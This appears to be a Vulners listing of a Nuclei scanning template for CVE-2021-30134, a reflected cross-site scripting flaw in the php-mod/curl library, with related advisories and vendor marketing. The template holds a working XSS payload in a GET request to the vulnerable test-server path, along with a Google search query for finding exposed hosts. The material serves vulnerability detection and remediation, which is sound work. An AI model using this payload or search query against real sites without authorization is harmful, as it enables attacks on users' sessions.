| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| CVE-2021-30134 | 14 Apr 202518:54 | โ | circl | |
| WordPress Plugin php-mod/curl ่ทจ็ซ่ๆฌๆผๆด | 26 Dec 202200:00 | โ | cnnvd | |
| CVE-2021-30134 | 26 Dec 202200:00 | โ | cve | |
| CVE-2021-30134 | 26 Dec 202200:00 | โ | cvelist | |
| EUVD-2022-7617 | 26 Dec 202200:00 | โ | euvd | |
| php-mod/curl allows Cross-site Scripting | 26 Dec 202209:30 | โ | github | |
| CVE-2021-30134 | 26 Dec 202207:15 | โ | nvd | |
| GHSA-F8P3-Q834-Q9CJ php-mod/curl allows Cross-site Scripting | 26 Dec 202209:30 | โ | osv | |
| WordPress Teamleader CRM Forms plugin <= 2.0.0 - Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability | 16 Apr 202100:00 | โ | patchstack | |
| WordPress HT Slider Range for Amazon affiliates plugin <= 1.1.9 - Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability | 16 Apr 202100:00 | โ | patchstack |
id: CVE-2021-30134
info:
name: Php-mod/curl Library <2.3.2 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
remediation: |
Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7
- https://nvd.nist.gov/vuln/detail/CVE-2021-30134
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-30134
cwe-id: CWE-79
epss-score: 0.01261
epss-percentile: 0.66085
cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: php_curl_class_project
product: php_curl_class
google-query: inurl:"/php-curl-test/post_file_path_upload.php"
tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project,vuln
http:
- method: GET
path:
- "{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"
matchers-condition: and
matchers:
- type: word
words:
- 'key":"<img src onerror=alert(document.domain)>"'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100ed37f77ff28354e58fc121bea4e8eef0dbb00e6759be2755fd5eef69cbc2d8e2022100abc3c5107453da534ca2355e912344e7df3a3caa70f861685f4efc9867d4cb8c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation